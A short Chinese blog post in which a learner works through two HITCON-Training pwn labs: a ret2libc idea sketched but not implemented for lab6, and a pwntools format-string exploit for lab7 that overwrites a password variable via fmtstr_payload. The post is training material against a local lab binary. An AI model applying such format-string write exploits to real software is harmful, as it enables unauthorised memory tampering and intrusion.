1.25第五条鱼

第四条鱼生病啦
所以没有第四条

啊我个菜鸡
https://github.com/scwuaptx/HITCON-Training的lab6和lab7

lab6 migration

首先这个。。。。
啊呀没得思路
不管了先扔Ida总不会错的

图片.png

然后把能找的都找出来

图片.png
图片.png
图片.png

有个思路是利用puts函数输出函数的地址然后再用libc找system构造system(\bin\sh)来做 然而我并不能写出exp
之后想想emmm

lab7 crack

Ida

图片.png

可以看出来这是一个格式化字符串的题

图片.png

然后发现参数在第十个

exp利用fmtstr_payload函数,这个函数的作用是用来生成格式化字符串漏洞写内存的payload.具体https://paper.seebug.org/246/

大概思路是把password修改成“1”
然后再次输入的时候就输入1 这样字符就相等啦
我真是个小机灵鬼

from pwn import *

sh=process('./crack')

psw_adr=0x0804A048

p1=fmtstr_payload(10,{psw_adr:1})
p2='1'

sh.recvuntil('What your name ? ')
sh.sendline(p1)
sh.recvuntil("Your password :")
sh.sendline(p2)

sh.interactive()

然而

图片.png

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容